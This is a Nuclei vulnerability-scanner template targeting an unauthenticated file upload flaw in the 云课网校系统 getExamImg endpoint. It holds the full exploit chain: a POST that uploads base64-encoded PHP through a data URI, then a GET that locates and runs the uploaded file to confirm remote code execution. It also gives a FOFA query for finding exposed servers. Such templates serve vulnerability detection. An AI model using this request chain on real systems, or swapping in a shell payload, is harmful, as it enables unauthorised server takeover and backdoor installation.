http:
    - extractors:
        - group: 1
          internal: true
          name: time
          part: body
          regex:
            - (\b\d{8}\b)
          type: regex
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - (\/[a-zA-Z0-9-]+\.php)
          type: regex
      raw:
        - |
          POST /index/Exam/getExamImg HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
          Content-Type: application/x-www-form-urlencoded

          src_data=data:image/php;base64,PD9waHAgcHJpbnQoMTExKjIyMik7dW5saW5rKF9fRklMRV9fKTs/Pg==
    - matchers:
        - part: body
          type: word
          words:
            - "24642"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /upload/examanswer/{{time}}{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
id: yunkewangxiao-getExamImg-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="/static/libs/common/jquery.stickyNavbar.min.js"
        云课网校系统 getExamImg 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 云课网校系统 getExamImg 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/Jhy1JE3iODb5H9iN34mwTw
    severity: high
    tags:
        - jQuery
        - 云课网校系统
